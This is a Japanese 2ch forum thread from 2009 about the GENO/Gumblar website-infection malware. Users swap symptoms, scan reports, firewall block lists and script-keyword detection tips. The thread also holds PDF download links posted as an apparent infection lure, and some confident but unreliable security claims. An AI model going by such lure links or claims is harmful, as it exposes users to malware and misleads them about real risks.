インターネット板とセキュ板のテンプレ勝手に変えて新スレたてて
今度は何をしてくれるのかな

この粘着って、自分が気に入らない事した奴が
ほかの奴らに自分以上に構ってもらえてるのが羨ましくてしょうがないんだろうなｗｗｗｗ

>>406
コレ本人だったのかドン引き

9.1.0では駄目の記述さっさと直せよ
亜種がどうこうで結果的に正しいからいいとかいうなら
技術者の資格ないしさっさとやめて
ゲーム脳とか水結晶でも信仰してろ

ttp://www.ipa.go.jp/security/announce/alert.html
亜種が怖いからここの脆弱性の対策は全部しとくべきですね

ｃｃｃクリーナーとか勘弁してほしいがな

>>499
運用板でのことは本当にアレだけど
テンプレ変えた奴は別じゃないのかね。
そこまでわかりやすいことしたら叩かれるのは目に見えてる。

だからもういいってば
もうｽﾚに来ないだろうしわざわざ話題にすることでもないだろ
話題にすればまた荒らすからやめとけ

利するのはヤツしかおらんし
コレまでの言動見てると叩かれてもヤル子よ彼は

テンプレ外したらな

チェッカー様の話題になると荒らしとセキュ板叩きが来るんだよ
なんかの偶然かな

とにかく新スレをたてるんやー
そしてシンテンプレにするんやで

8％でまあまあ危険ってなんだよ
ろくでもないコメントどうにかしろ

荒らしとセキュ板叩きってどれのことかしら

>>512
だいぶ前に見たわ。
セキュ板の民度が低くて話にならないだとか何回も書いてた

チェッカーの話はやめよう。
余計なこと話したらまた文句言われる。

クソサイトの話はやめよう

初心者は使わないほうがいい
全部危険とか言い出すし

初心者だから使うんだろ

いいえ

はい

GENOチェッカーで危険と出たのでもう見にきません

【つこうた】NECネッツエ○アイ株式会社員がつこうた【盗撮魔人】　★２
http://tsushima.2ch.net/test/read.cgi/news/1243770160/

ウイルス収まった？？
801連中しかしらないサイトだし、どうなったかッわかりづらいな

http://www.vector.co.jp/soft/dl/winnt/util/se446336.html

VECTORからフリーソフト落とそうとしたら警告されるんだが大丈夫？

ココそういうスレじゃねえから

>>456-457
ＩＤ出す話でも そうだけど、こういう話になると、
いつもタイミングよく、直後に否定のレスが付くね。

ココそういうスレじゃねえから

>>525
かいたやつがびびってるんだろな

テンプレは直さないほうがいい！
荒れるぞ

直さないと荒れるワ

>>527
気のせいかな。今度は都合の悪いレス
流そうとしてるように見えるんだけど。

そのトーリ

全部通報せえやハゲ

詰めが甘いスレだ

>>532
　　　　　　　　　　　　 ／）
　　　　　　　　　　　／／／）
　　　　　　　　　 ／,.=ﾞ''"／
　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　こまけぇからハゲるんだよ
　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼
　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼
　　　/　 　　ﾉ　　　 ilﾞフ::::::⌒（__人__）⌒::::: ＼
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／

AV入れてみたが思ったよりも軽くて予想外。
ちゃんとスキャンしてるのか試しに鑑定すれからGENOウイルスをダウンロードしたけど。
全て検知した。

>>535
スキャンが重い。今、床ピタン焼肉で盛り上がって保健所にメールしてるけど
時期が悪かったら感染しまくりだったんでは・・・・

535は誤爆です。すんません。汁。

ﾃﾝﾌﾟﾚとかどうでもいいっしょ
もうGENOｳｨﾙｽなんて引っかかる奴いないし

じゃあこのスレでオワリな

>>538
どうでも良くないから話題にでるんだろ。

＞もうGENOｳｨﾙｽなんて引っかかる奴いないし
そう思うならこのスレにくんなよｗ

今は危険性無いんだろ？

腐女子に隠蔽されて状況がわからなかったな
視ね腐れ女ども

亜種って言っても報告は無いんだろ？

>>543
亜種だらけだったから、各ベンダーのシグネチャが遅れまくったんじゃないか。
本体の配布が止まってしまったから、どれくらいの亜種がカバーされてるのか
よくわからないし、感染放置されているサイトがいきなり活動を再開する
可能性もある。

>>544
何を言っているのかわからない・・・

GENOウイルスと他のウイルスの違いは何？

>>545
俺はわかるが。

もうスレ立てるとかとんでもねえなあ

テンプレもアフィサイト準拠にわざわざ直しとる…

落ちるまで放置でいいんじゃね？＞アフィ準拠

必要なら、アフィチェッカー入ってないスレ立ててそっち利用すればいいよ。

次スレワロチｗｗ

チェッカ信者が立てやがったｗｗ


アンチチェッカ派が立てるに40ペリカかけてたんだがなあ…

次は19の1にもどしてね
なんでwikiとか外されてんのよ
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
http://www29.atwiki.jp/geno/

短縮URLが判る方法ない？

【MHP2G】モンスターハンターポータブル2ndG HR341
http://jfk.2ch.net/test/read.cgi/handygame/1243680693/

の下の方に出てるURL踏んでも何も表示されないから怖いんだが

質問スレ池カス

553-554

553ー55449

何だかジーンズの型番みたいだな

>>548
スレ立て乙。

はあ

新たな「Webウイルス」出現、2万件以上の正規サイトに埋め込まれる
「Glumbler」ウイルスとは別物、対策ソフトを使っていても被害の恐れ
http://itpro.nikkeibp.co.jp/article/NEWS/20090601/331097/

さて、どっかサンプルサイトないだろうかｗ

んもー、改ざんされるような管理なら公開するなよ！！

何のソフトの脆弱性つくか書いてないのか

未対策の脆弱性突かれたら終わりだな

>>562
元記事にも書いてない。
google-analytics.comに似た名前のドメインに誘導するってことくらいしか
わからん。

ウイルス対策ソフトのことかよ

任意のコードを実行できるVMwareの脆弱性について報告
ttp://www.nri-secure.co.jp/ncsirt/2009/0421_1.html

もし　かも　多分　

>>560
何気にバスターが検出してるな

しかし、このトロイの木馬を埋め込むことによって、誰が得をするの？
ウイルスなら愉快犯もあるだろうが、データ送信してる今回の奴とかなら、その線から吊し上げたほうがいいんでね？

>>568
ノートン、カスペル先生は？

してません

ざんねんだったな

>>570
守ってくれる！

と強く念じる心があれば・・・

ttp://www.virustotal.com/analisis/e72cd54464322f69174d69d2985f067469dc5aa1b97c8c762c34d1bfab38d60e-1243616644

常駐先は、.../winlogon/Notify 本体はDLL
データが、HKLM/Software/MSSMGR にできるらしい

Quick Time も攻撃対象に入っている ただし、最新の脆弱点が突かれているかは調べてない

http://www.virustotal.com/jp/analisis/57c3582fa2f1c55fd9cde79bb02138529a6b6f0351cb5c49a69ad2ae6c19c6ec-1243856883
※入手経路情報が書き込まれている可能性: ハッシュは一致しません

>32
これって、Windows2000でもいけるの？

>>32 罠
>>60 本物

楽天のトップページにある「激安1本当り23円から」の
リンクをクリックすると、PG2で「GENO」がブロックされる。
まさかと思いソースチェッカーで確認したら、
このページに埋め込まれたJS内に
「unescape」「eval」「replace」の3つを発見。

ここのURLは貼らないほうがいいっすよね？
他にも楽天の爽快ドラッグが感染している模様。
もしかして他にも楽天内で感染してるショップが
たくさんあるんじゃないかこれ。

というかどちらも同じ外部JSファイルを使用しているので、
楽天全般の問題？

マジか？

自分がチェックに使ったのはここ
ttp://so.7walker.net/guide.php

ためしに楽天の爽快ドラッグのURLをチェックしてみてほしい。
「s_code.js」の中に以下の結果がでるよ。

「注意！ループタグを発見！ (1)
危険！無限ループを発見！ (1)」

誤爆じゃないのか？
s_code.jsには確かにunescape、eval、replaceが含まれているけど
GENOじゃない

・激安23円
・総会ドラッグ

確かにunescape等はあるが
ソース見たかぎり特に異常は無いが？

>>582
うん、GENOでもないし、ヤバいスクリプトでもないね。
unescapeもevalもreplaceも文字列を評価して置き換えたりする場合に
普通に使う関数だから、これらが入っていたらGENOだ、っていうのは
乱暴すぎる。

「unescape」「eval」「replace」があっても大丈夫なのか…。
JavaScriptにはうとかったもので、つい驚いてしまった。
あからさまに怪しげなソースになってない限りは大丈夫そうなんですね。

っていうか他の店で買い物した直後にこれ見つけたんで、
てんぱってしまった。お騒がせしました。

でも楽天の店舗の一つも確か感染例があったと思うから注意するのは良い事

＞リンクをクリックすると、PG2で「GENO」がブロックされる。

ここが少し気になるな
PG2が反応するって事＝GENOの該当IPに反応って事だからな

「Gumblar」攻撃、いまだに沈静化せず--ScanSafe報告
ttp://japan.zdnet.com/news/sec/story/0,2000056194,20394092,00.htm

ガンブラさんより、>>560の方が気になって仕方ない

>>587
http://www.omniture.com
と、omniture.comの管理下のサイトのリソースを利用している。
PG2で66.235.128.0 - 66.235.159.255あたりをブロックしてると
引っかかると思うけど、どういうルール使ってるのかも知らんし、
PG2自体使ったこともないから、よくわからんな。

>>578
反応したアドレスを貼ってくれ

>>590
自分の使用しているGENO系リストはここでもらったものです。
ルールとかは自分もよくわからないので何とも。
ttp://pc11.2ch.net/test/read.cgi/sec/1228949365/328

>>578
URLむちゃくちゃ長くて直接貼るのはちょっとあれなんで…
ttp://www.rakuten.co.jp/

ここの「激安1本当り23円から」のリンク先です。
とりあえず楽天のトップではPG2も反応しない。

>>592
PG2ってどのIPをブロックしたとかいう情報はログに残らないの？
ソース見た限りじゃ問題なさそう。埋め込みのjsも外部jsも変なところは
ない。
Firefoxの先読み機能が有効だとリンク先に潜んでるのかもしれないけど、
そこまでチェックするのは面倒くさい。

>>592
この際、PG2導入して試してみるからそのリストupしてみて
mediafireは踏みたくない

>>593
ブロックされたGENOのIPは全部同じ、楽天の202.72.52.16。
これと一緒に443ポートから以下へのアクセスもブロックされてました。
Archer Communications 66.235.139.118

これは自分が楽天で買い物していた間の記録のようで、
>>578に気づいて以降の記録では、何度か楽天のサイトにアクセスしても
上記二つのIPは80ポートのみブロックされてました。

>>594
うｐはOKです。安全なうｐろだというか、
オススメのところありましたら教えてもらえますか？

>>595
じゃあ、↓から適当な板選んで
ttp://www.axfc.net/uploader/#x2

うｐしました。DLパスは581です。
ttp://www1.axfc.net/uploader/File/so/24547

ついでなので、自分が所有しているリスト全部いれました。
使用しているウイルス関係はこのZIPの中身のみです。

素人目に少し調べてみたんだが特に異常は見当たらず
詳しい人のレスを待て
どっちにしても楽天は昔から裏で何をやっているか分からない企業なので買い物は勧められないな

>>597
mediadefenderでadobeのリスト配ってるものだが
そういう配り方辞めてくれないか？いいかげんウザくて仕方ねぇ
どうしても同梱させたいなら何があっても絶対に消されないうｐロダにうｐしろ

>>583
同じくソース見る限り、問題なさそうではあるが・・・

アフィチェッカーで20%とか出たから大騒ぎしてるのか？

普通に使う関数に大騒ぎ

evalとunescape同時に使うさいとは例外なくゴミ

スポーツ専門チャンネルのWebサイトが改ざん被害
http://is702.jp/news/574/

これもGENO？

世界2000サイトが改ざん被害、新手の悪質コードで攻撃か
ttp://www.itmedia.co.jp/enterprise/articles/0906/02/news024.html

こんな話もでてきているようですな

>>605
ttp://www3.atword.jp/gnome/2009/06/01/20000-site-compromised-and-still-no-disinfection/

>>605
ITMediaでも「GENOウイルス」って呼ばれてるのかｗ

2ちゃんの力も馬鹿に出来ないな
まじで

www.gocebit・com.au<suspicious>
www.mycebit・com.au/rego09/　　<suspicious>

>>608
被害者に２ちゃんねらーが多かったということかと
これが、被害者におばちゃんが多いようなウイルスだったら、また違ったｗ

websenseの記事にあるスクショによると
新型？のは</body>タグの後にながーいjsスクリプトでいいのかな

既出かもしれんが、感染したPCのsqlsodbc.chmを開いてみた。

FTPのホスト名・ログイン名・パスワードが記録されてた。ただし前後リバースされて。

>>612
一件だけ報告があったけど重ねて情報あれば助かるよ
仮想だとその辺がうまく動作しなくて確認できないから貴重

>>613
ありがとう。
追記になるけど、リバースされて記録されたのはgumblarが流行った頃に感染したPC。
もっと以前、初期のzlkon（GENO）流行時に感染したPCのは完全にイミフな文字列でした。

>>613
俺もVMに感染させたけど、最初に改変された状態のままで、ftpサーバに接続
しても内容が書き換わらなかった。
やはり、仮想PC回避コードが入ってるのかね？

ハッシュ確認しようと思ったんだけど
ハッシュチェッカーってexeに直接ファイルをドラッグ＆ドロップさせても問題ないのかな？

>>615
いや、正確なプロセスの位置を探せないんだよ仮想だと

単なる四月馬鹿のネタなのにw

今パソコンつけたら青い画面に英語で何か書いてある…パソコン動かない。avast入れてadobe reader、FLASH共に最新だったのに。昨日itune最新版更新したんだがこれが原因なのか？

何か書いてあるんなら、何が書いてあるのか書けよバカ

だいたいスレ違いだろ

>>619です。スレ違いすみませんでした。

ところでバスターはもう対応済みなのかね？

>>617
それはないと思うけどなぁ。
プロセス間通信がまともにできなかったら、正規のアプリですら誤動作する。

なんで正規のアプリと一緒にしちゃうの

プロセスってかサービス関連が特殊だからだろ

そんなに特殊でもないけどな。

ただでさえクソ重いpdfファイルにウイルスまで仕込まれた新種登場　名実共に誰も開かないゴミ拡張子へ
http://tsushima.2ch.net/test/read.cgi/news/1243985189/

GENOじゃないがほんとpdf駄目だな

現時点で対応してるウイルス対策ソフトって何々あるの？

Masuzoe

脆弱性の部分をアップデートしておけばGENOタイプは滅多なことじゃ感染しない
ウィルス対策ソフトに頼る前にそっちからやっていこうぜ

高度化するPDF悪用の攻撃、回避するポイントは？
ttp://www.itmedia.co.jp/enterprise/articles/0906/04/news019.html

このウイルスってwindows95、98とかでも感染するの？

どこに巣食うかによる

>>631のようにゼロデイアタックを知らずに、脆弱性を塞いでおけば
ウイルス対策なんかいい加減で好みのものを使えばいい、あるいは
なくてもＯＫと思っているそんな奴に限って知らぬ間にＰＣを乗っ
取られるんだぜｗｗｗ

だが脆弱性もチェックしてくれる高検知率のカスペなら安心だな

ほらな[age]だろ

>>635
釣りのようだ

マジなら支離滅裂な思考について行けないな

民剤でらりってるんだろ

foxitに乗り換えてスクリプトを無効にすればまずPDF関係の感染は解消されると思う。
起動もadobeより速いし、無料版でも広告を消せるし、
マルチリンガルだし、アクチベーションが何とかって喧しく言われないし

んなことはこのスレにいる誰でも知ってる

それを踏まえて定期的に書く事に意味があるのだよ。
そもそもadobe製品にはロクなものが無いから・・・

>>639
OPERAも[pdf]の関連付け外せば自動実行されね-ぞ
表示は速いし
広告は初めからないし
スクリプトもページごとに設定可能だし

flashは使ってるくせに

FLASHは基本外してる。
必要のないところで使う必要もないし。

そうだね、Opera最強伝説だね

★同人新スレにアフィが追加されました！

【報告専用】同人サイト向け・GENOウィルス注意11
http://changi.2ch.net/test/read.cgi/doujin/1244096936/

いや、最強かどうかは知らんが
FireFoxだけ利用者が増えると
ターゲットがIEから火狐に移るだけだろ？

色々有るから、設定方法も知って使って欲しいだけ

最新版にしてリーダはスクリプト無効にしときゃ平気

前からあっただろｗ
必死ﾀﾞﾅｰｗｗｗｗｗｗｗｗｗｗ

火狐に関してはnoscript導入が当然のようになっているが
RequestPolicyや他のアドオンの組み合わせでもセーフな気がする

しらん

絶対なんていってないだろ
比較的操作設定が容易で利用者が多いから勧められてるだけかと

ブラウザ戦争しろ

突っ込み病患者に優しくしてあげてください

NOSCRIPTは確かにめんどくさい
USの方のアドオンサイトに行けば割と掘り出し物があるからお勧めする

スクリプト無効なんてやってられるか
脆弱性の対策しときゃ大丈夫だ

それが>>656の最後の言葉であった

スクリプトなんか切る奴は情弱って言ってる人もいるんだけど
何もわからない本物の情弱ははっきりしないことはとりあえず念入りにしときます

全く安全
多くのウイルスがJavaScriptを介して、pdf、swf等を読み込ませるからJavaScriptが問題だと勘違いされがちですが、
javascript単体にはローカルファイル操作、レジストリ改変等を行う機能は存在しません
よってその対処法を導入していれば持続的な被害に合うことは一切ありません




>>657,658
雑魚は黙ってなさい

まぁ、GENO亜種や非ガンブラー系の対策としてJS切っておくのは間違いではないな
もう、普通のGENOの時代は終わった
っていうか、ただの氷山の一角に過ぎない
本当の地獄はこれから

IDの出ないスレだと強気だな(｀・ω・´)

念のために言っておくと・・>>1-661のレスは俺一人の自演だから

>>659
アフィ管理人きたー！
↓これ直さないの？ねぇねぇ直さないの？

■ adobe readerを9.1.1にアップデートする(9.1：9.1.0では駄目)

>>659
強気あなたかっこいいです

かんりにんじゃないよ

トリップつけるでしょ
>>406

ドーデもいいから同人板で語ってくれ

>>655
よそのアドオンもいいですが、たまには、ぬりかべのことも思い出してあげてください。

>>314159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196

>>631
とりあえず、アップデートはまめにしてるんだけど、ちょっと心配だったから聞いてみたんだ。
レスありがとう

>>669
なにこれこΠ

円周率もしらないのか

吊ってくる

>>672
>>673がなかったら気がつかなかったよ。
ありがとう。だから、イ�`。

チェッカーで調べたらamazonが１０％で少し危険ってあったけど
これは既出なの？
それとも１０％くらいじゃみんな気にしないのか

99%でも気にしない

>>675
そもそもチェッカーは当てにならないし

てかTOPの書いてあるのちゃんと読もうよ

100%になったらまたきてね

1000%になったらうちに来ていいよ

なんか伸びてると思ったら…なんのこっちゃｗ

うちのサイト、今までチェッカーで1000%だったんだけどさっき調べたら100%まで落ちてたｗｗ

ちぇっかーｗ

チェッカーはかなり前に100%制に改定されてるだろ
どっちにしろ、信用は出来んが

君は1000%〜♪

>>642
勘違いしてるようだがfoxitはPDFリーダでWebブラウザじゃないぞ。

>>659
javascript単体でどうこうするウィルスは確かにほとんど居ないが、脆弱性自体はあるし、あった。
ウィルスではないが、XSSなどはjavascript経由で発症する物がほとんどであるし、切る事で安全性は確実に高まります。

「自分の持つシステムのパスワードを全部統一していてもどれかが洩れない限りは安全ですが洩れたときのことを考えてばらつかせる方が安全です」
ってのと同じで、被害を広げない意味での対策としては非常に重要です。

セキュリティのセの字も知らない雑魚は黙ってなさい

>>684
カルロス　乙

>>686
JavaScriptの話は別として
そいつの話で問題なのはJavaを無効にすれば問題なしって話だろ
全く的外れに思えるが良いのかそれで？

>>688
いいえ良くありません
JavaScriptとJavaはまったく別のものです

じゃあなんでサイトの間違い直さないんだ
今は良いとしてGENOが復活したらまずいだろ

>>688-690
雑魚は黙ってなさい

ふざけてねえ出直せよ

>>691
ごめんなさい

もう封鎖したよ。潜在的な感染者はかなりいるだろうからまた新たに増やす意味も無い。

作った奴の予想以上に馬鹿が多かったって事だ

なにを封鎖した？
迷惑サイト？
ならまだあるよな
GENOに限らないことだから間違ったままにしとくなよ

偶然かもしれんがアフィのアマゾンリンク？クリックしたらリンク先でブラウザがクラッシュした
詳しい人調べてみて

アンチが一気に沸いてきた



というより
アンチ：恐らく一名の活動時間になった

今週は忙しかったの?

アンチとみせかけてクリックさせようとしてるんだろｗ

ほらな？改行だろ

同人テンプレにチェッカー追加するぐらい暇なんですね＾＾

>>690
やぁチンピラくん。今日は改行しないのかい？サイトを直さない理由は、直す必要が無いからだろ。
ユーザ側でパッチを当てるなりして対策すれば解決できるものなら直す必要は無い。

アフィは外せないけど運営鯖無料で貸せよ

また句読点の人きたよー

100%で安全なんだか危険なんだか統一したら

雑魚は黙ってなさい

[ad] [ad] [ad] ＞＞＞(オススメ度)＞＞＞＞ [ad]

>>704
100%を求めるなら世のソフトは全て危険
前科があるかないかで言ったばあい、JavaもJavaScriptもFlashもAdobeReaderもFoxitもOperaもFirefoxもIEもShockwaveもHTMLもMIMEも危険
危険性の高いミスの発見頻度で言えば、IEやFlashやAdobeReaderはまだまだ危険がいっぱい

1000%が出た場合確実に感染しています。(05/29 02:425現在)
100%程度が出ても現状ではたぶん大丈夫です。(05/29 02:42現在)
↑の記述のことね

>当方確認のGENOウイルスのみに関して05/30 07:47現在では100%(値を修正しました。)以外安全です。
どっちだよ

雑魚は黙ってなさい

そのコピペフレーズ見るたび、>>406で言われたのが、よっぽど悔しかった
んだろうなって透けてみえるから、使うのやめたほうがいいと思うよ。

マジレスするとお前以外このスレ全部俺の自演なんだ
ごめんな(´・ω・`)

見当外れなこと言われて悔しいわけないと思うが
単に馬鹿にしてるんじゃね
そんなこと理解できないとはおまえ本人か

本人じゃなかったら新手の雑魚だろう
そんなことより早く直せよ

こっちが静かだった間、セキュ板ですっごく伸びてたスレがあるんだけど
こっちが荒れだした途端、ピタッとレスが止まったよ。
これって、偶然かな？

うん
偶然だよ

よかった。安心した。
帰るところ無くなると、困っちゃうもんね。

ぶっちゃけ複雑なJAVAスクリプト使ってるところはチェッカーに反応する
って前にも何度も何度も説明してたな

役に立たない上にアフィリエイト付きかよ

チェッカーから有意な結果を得るより
素人が自分でソース調べられるようになるほうが早いなｗ

adobe readerはインストールしなくても問題ないんですか？

それは、貴方次第です

PDFファイルを使うことが無ければ必要ないんですよね。
adobe readerがインストールされていなければ問題は無いんですか。
ネットくらいしかしていないパソコンでもPDFファイルは使ってるものなんですか。

ここでぱそこんのつかいかたを聞くなよ、よそでやれ

すみません

なんていうか、初心者互助キャンペーンは終了しましたよっていう流れですな

もう次スレいらナイツ

>>734
「ぱんつのかいかた」に見えた俺は疲れてるのかも試練

相当疲れてるな

なんかPCがおかしいと思って調べたら
これぽっいorz

いったい、いつ感染したんだよ
やっぱり再インストールしか方法ないのか？

はい

いいへ

yes

ぱんつのかいかた








↑疲れてないよそのままだよ>>728

そこは
ぱんつのかいかた
で文章でも作るところだろ
センスねえな

なるほど

>>734-735
一晩ぐっすり寝たらテンション上がってきた
しまむらでぱんつ買ってくる！

本スレの832だけど、GENOを語るスレ(パソコン一般板)
で全部押すとavastでトロイの木馬とか出るんだが
AVGとかノートンだと、どう？

>>738
「全部押すと」の意味が分からんが、どうせコードが書き込まれただけだろ
いちいち気にせずにROMれ

>>739
スマン、Avastスレ行って問題ないと
わかった

「全部」押すと
じゃね？

ああ、IEか
通りで

2ちゃんねる専用ブラウザーで閲覧しているとは限らないから……

使ってるブラウザはFirefoxなんだけど
パソコン一般板で、GENOのスレ31・32
両方で「全部」押すと警告出たからカキコした
ちなみにIE8でも、やっぱり警告出た
誤検出だと思うが…

>>735
かけそばでっせ　で縦読みしてしまったorz...

直ったかも
>>32とaux2のファイルを上書きしたら
コマンドプロンプトとレジストリエディタ復活した

>>744
IEでもFirefoxでも非専ブラという意味では同じです

スクリプトの功罪やな。

>>744
問題ないよ

>>747・749
�d
騒いで正直スマンかった

軽くなったし、とりあえずこれで
様子を見ることにしよう

よかったね

10%も踏まないほうがいいの？

踏んでもおｋ

>>754
50％ぐらいだとやめたほうがいい？

降水確率じゃないんだからｗ

ソース見ればいい話

アクセシしないとソースってみれないよね？

ミス
アクセス

>>756
＞降水確率じゃないんだからｗ

降水確率ワロタｗ

アクセシｗ

何も面白くない

>>758
右クリックとかで保存すれば？

ああソースみれるサイト見つけた
なんて書いてあったらヤバイんだ？

>>764
オタフク

>>765
ここでソース見れた
ttp://so.7walker.net/guide.php

宣伝市ね糞

宣伝違うし
お前らどこでソース見てるの？

http://www.aguse.jp/

普通にコレ貼れや

>>769
そこソース見れないんだけど・・・

私の場合は、いろいろなところの市販品を使ってきた後、今はAntiVirのフリー版に落ち着いています。
検知率はもとより、スキャンスピード、対ウイルス反応、軽さ、誤検知率の低さ、など勘案するとアンチウイルスソフトではAntiVirが最も優秀だと思います。
しかし、このソフトは日本語表示がない上、いろいろ設定が細かいということもあり、どうも一般の人たちには敷居が高いみたいです（事実avast!やAVG、キングソフトなど、他のフリーソフトに比べると使用率は低いと思います）。
他の某専門サイトなどでも、「このソフトはある程度スキルのある人しか使わない」などとコメントされていたりします。
もし、これが日本語対応になれば、その性能の良さと相まって利用者数は相当増加すると思うのですが・・・（確かに、周りでこのソフトを使っている人をみると、パソコン上級者といわれるような人たちの利用率が高いように思います）。

Aviraのフリー版についてですが、個人的にはデフォルトよりも自分で設定したほうが良いと思います。
何といっても、ウイルス発見時のあの音（？）はびっくりするので個人的にはこれはオフのほうが良いと思います。
ルートキット検索機能も確かデフォルトではオフなので、設定でオンにしていたほうが良いのではないでしょうか。
あと、ウイルスの処理も、設定であらかじめ指定した手順で処理させることもできるので、スキャンの終了までパソコンの前に居れず、手動で処理できない人はそちらに設定し直しても良いと思います。
フリー版のメールスキャンについては、一応メールを開くときに実行するそうです（ただし、これをメールスキャン機能と呼ぶかどうかは別問題ですが）。
あと、Aviraのヒューリスティック機能は最優秀らしいですが
設定は「中」で必要十分だと思います（デフォルトは「中」なので変える必要はないですが

>>766のブログなんかよく分からないけど。汚ねぇHTMLだな。
ソースチェッカーとか付ける前に自分のソース直せよｗ

ソースチェッカーオンラインは有名だと思うんだけど

セキュリティ初心者はまずこれを読め

http://u3.getuploader.com/akaiup/download/248/0218.pdf
http://u3.getuploader.com/mob/download/7/0219.pdf
http://www.tolucky.tv/uploader/src/0220.pdf

だからPDF怖いって

File 0220.pdf received on 2009.06.06 17:28:43 (UTC)
Current status: finished
Result: 0/40 (0%)

31 名前：GENO ◆AbjB8MStDM [sage] 投稿日：2009/06/07(日) 02:21:44 ID:q5QX3JD60
セキュリティ初心者はまずこれを読め

http://u3.getuploader.com/akaiup/download/248/0218.pdf
http://u3.getuploader.com/mob/download/7/0219.pdf
http://www.tolucky.tv/uploader/src/0220.pdf

34 名前：名前欄にスレ名入力推奨＠自治スレ[sage] 投稿日：2009/06/07(日) 02:58:35 ID:wm24k99x0
>>31
はいアウト
ウイルス配布は重大な犯罪だからな
これから数年間は警察の影におびえるといいよ

39 名前：GENO[sage] 投稿日：2009/06/07(日) 03:24:38 ID:dWjSklXY0
セキュリティパッチ当ててない奴は絶対踏むな
マジで危険

42 名前：GENO[sage] 投稿日：2009/06/07(日) 03:30:56 ID:dWjSklXY0
>>40
ID変えてご苦労様です
軽い気持ちで人生棒にふった気分はどうですか？

44 名前：名前欄にスレ名入力推奨＠自治スレ[sage] 投稿日：2009/06/07(日) 03:34:25 ID:g5tEWN8V0
>>42
File 0220.pdf received on 2009.06.06 17:28:43 (UTC)
Current status: finished
Result: 0/40 (0%)

47 名前：GENO[sage] 投稿日：2009/06/07(日) 03:55:50 ID:hoaxuigN0
流行中で自己書き換え型のマルウエアが
対策ソフト引っかからないなんてよくある話
どんだけおめでたい頭なんだよ

48 名前：GENO[sage] 投稿日：2009/06/07(日) 04:00:06 ID:M8NZAXqJ0
>>47
で、
飛び先は？IPAの注意喚起がマルウェアって証拠は？その根拠は？

49 名前：名前欄にスレ名入力推奨＠自治スレ[sage] 投稿日：2009/06/07(日) 04:04:29 ID:2Yomg2r10
なぜ自分で確かめない

え、ネタで言ったらマジだったのか。
よく見るとムダにアップローダとか胡散臭すぎるな・・・
踏まなくてよかったぁ

そういう釣りはいいから
3つともヘッダから何まで普通のPDFファイル

PG2 葱用ブロックリスト追加しました。
Virus Block_4.txt
http://uproda.2ch-library.com/lib136316.txt.shtml

key?

>>781
ウィルス

>>781
頂戴しました、thx!!

俺ももらった
IPなんかころころ変わるから気休め程度にしかならないだろうが
それでも何もやらないよりかは精神的にマシ

てｓｔ

今もGENOってやばいん？

三菱自動車の「アイ・ミーブ」のページで仕様をPDFで閲覧したところ
FireFoxの動作がおかしくなったのでavastでスキャンしたら
「JS:Redirector-H [Trj]が発見されました」
とアバストたんが言ってるんですが。

�@ｃｍｄ．ｅｘｅは実行可能
�Aamd64_microsoft-windows-m..ents-mdac.resources_31bf3856ad364e35_6.1.7100.0_ja-jp_cda73122ed3dbaea_sqlsodbc.chm_92fe0a89

サイズは、101,136　　ディスク上のサイズは、102,400　バイト
ja-jp_cda73122ed3dbaeaの部分が違うものが23個検索でヒット

OSはWindows 7 RC ヴィルド7100（64bit）
UACは　ユーザがWindows設定を変更する場合は通知しない（上から１個下）
ルータ有り・PFWはWindows標準もの・セキュリティソフトはavast4.8HOME
AdobeReader9.1.1　AdobeFlash10.0.22.87 Java(TM)6 Update13 6.0.130

症状としては、ハイパーリンクをクリックしてもライブラリが表示されるだけで
リンク先が表示されない
Windowsのスタートメニュをクリックしても何も表示されない
PCを再起動するとこれらの症状は直るが、HDDがカリカリ言ってる

>>788
開いてみたけど問題ないよ。
ダウンロードページのjsでunescape使ってるから、誤検知したんじゃね？

> 症状としては、ハイパーリンクをクリックしてもライブラリが表示されるだけで
> リンク先が表示されない

この意味がわからない。

javaで小窓が開いてるのに気付いてないとか
ポップアップブロックで殺されてるとかじゃないかな？

>>789
よかったぁ
tp://ev-life.com/index.html
ここのChangeTheDriveを見てて、上にあるメニュのトラクションコントロールをクリック
してもリンク先が表示されなかったので不審に思ってスキャンしてみたわけです
そうしたら上のような結果に。今もスキャン中です。
その直前にPDFでスペックを見ていたのでそれが原因かと思ったのですが
よく考えたら、GENOとPDF閲覧って関係なかったかも
誤検出だったのかなぁ
もう一度同じHPの項目クリックしてもちゃんと表示されるしなんだったんだろうか

リンク先が表示されずにライブラリ云々というのは、Windows7での新ライブラリの窓が
何故かHP上のテキストをクリックすると表示されるようになったのですよ
どのテキストリンクをクリックしても何故かライブラリが表示されるように。
やれれたと思ったのですが、誤検出でしたか。
とりあえず安心しました。
ありがとう

cmdじゃなくてsqlsodbc.chmのほうを起動してみればいいのに

しばらく来てなかったからわかんないんだけど、
なんでwikiのほうのまとめサイトをテンプレにいれないの？
アフィでも張ってあるの？それとも別の理由？

GENOウイルススレ　感染4台目
http://pc11.2ch.net/test/read.cgi/internet/1243050166/
【報告専用】同人サイト向け・GENOウィルス注意11
http://changi.2ch.net/test/read.cgi/doujin/1244096936/
GENOウイルススレ　★21
http://pc11.2ch.net/test/read.cgi/sec/1243346768/

>>406
>>501
>>499

既出か知らんがラジオフライヤーでググって一番上のが感染してるっぽい

>>795
もろだな。感染確認した

通常のGENOなら感染していても機能はしないから二次被害の心配はないはず

>>797
でも、感染放置してるってことはftpパスを抜かれたままの状態だから、
htmlを再書き換え可能な状態なわけで、安心はできないよな。

じゃあ今のうちにFTPソフトそのものを
削除したら良いんじゃね
更新はファイルマネージャで行うか
ブログに移行

ESETです　トロイの木馬だそうです

